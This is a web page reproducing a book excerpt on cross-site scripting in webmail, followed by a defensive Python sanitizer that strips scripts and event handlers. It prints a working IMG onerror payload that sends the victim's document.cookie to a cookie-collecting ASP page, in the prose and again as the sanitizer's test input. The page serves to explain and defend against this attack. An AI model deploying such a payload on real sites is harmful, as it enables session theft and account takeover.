  SQL Server Tips by Burleson

Cross-site scripting (XSS)

Cross-site scripting consists of inserting script code (usually JavaScript or VBScript) or invoking malicious Java applets, ActiveX controls or Flash objects. The injection point can be a hyperlink, a frame or iframe, a CGI variable, the input of a web application, or any other vector that lets code from one site execute in the context of another site. The technique is sometimes called script injection, or "phishing" when it is aimed at stealing financial data through spoofed emails and fake websites, or through real websites with a script running in the background to steal passwords, spoof the browser's address bar, and so on.

Some webmail systems allow HTML mail and execute the scripts it contains, which makes "cookie theft" possible: the injected script runs in the webmail site's own origin, so it can read that site's authentication cookie. With this cookie, an attacker can gain access to the email account. Some exploits run silently, without the user clicking a hyperlink; all it takes is opening the email. This is an example:

<IMG width="0" height="0" onerror="window.open('/cookieThief.asp?'+document.cookie);" src="::">

The onerror event handler fires because the image source is invalid. The handler opens a window that runs an ASP page whose sole purpose is to receive the authentication cookie for that site and store it. That page might even contain code to open a window, use the cookie to access the webmail account, and change its password.
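The defence on the webmail side is to strip script-capable markup before the message is rendered. The following sanitizer is an added example, not code from the book; it rebuilds an HTML fragment while dropping script/object-style elements, every on* event handler attribute (the onerror hook used above), and URL attributes with a javascript:, vbscript: or data: scheme. The sample payload is a constructed copy of the IMG tag shown above.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements that must never reach the browser from a mail body.
BLOCKED_TAGS = {"script", "iframe", "frame", "object", "embed", "applet",
                "style", "meta", "link", "base", "form"}
DROP_CONTENT = {"script", "style"}          # inner text is dropped as well
URL_ATTRS = {"src", "href", "action", "background"}
SAFE_SCHEMES = {"", "http", "https", "mailto", "cid"}


class MailSanitizer(HTMLParser):
    """Re-emits an HTML fragment with script-capable markup removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skipping = [], None

    @staticmethod
    def _safe_attr(name, value):
        if name.startswith("on"):           # onerror, onload, onmouseover, ...
            return False
        if name in URL_ATTRS and value is not None:
            # Remove embedded whitespace first ("java\tscript:" tricks).
            scheme = urlsplit(re.sub(r"\s", "", value)).scheme
            return scheme in SAFE_SCHEMES   # rejects javascript:, vbscript:, data:
        return True

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            return
        if tag in BLOCKED_TAGS:
            self.skipping = tag if tag in DROP_CONTENT else None
            return
        kept = [(n, v) for n, v in attrs if self._safe_attr(n, v)]
        rendered = "".join(f' {n}="{escape(v or "", quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{rendered}>")

    def handle_startendtag(self, tag, attrs):   # <img .../> has no closing tag
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self.skipping:
            if tag == self.skipping:
                self.skipping = None
            return
        if tag not in BLOCKED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))


def sanitize_mail_html(fragment: str) -> str:
    """Return the fragment with handlers, scripts and unsafe URLs removed."""
    parser = MailSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed sample: the cookie-stealing IMG payload discussed above.
PAYLOAD = ('<IMG width="0" height="0" '
           'onerror="window.open(\'/cookieThief.asp?\'+document.cookie);" src="::">')

if __name__ == "__main__":
    print(sanitize_mail_html(PAYLOAD))   # <img width="0" height="0" src="::">
```

Sanitizing the markup complements, rather than replaces, marking the session cookie HttpOnly so that document.cookie cannot read it even if a script slips through.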

The above book excerpt is from:

Super SQL Server Systems
Turbocharge Database Performance with C++ External Procedures

ISBN: 0-9761573-2-2
Joseph Gama, P. J. Naughter  


Copyright © 1996-2017 by Burleson. All rights reserved.

Oracle® is the registered trademark of Oracle Corporation. SQL Server® is the registered trademark of Microsoft Corporation. 
Many of the designations used by computer vendors to distinguish their products are claimed as Trademarks
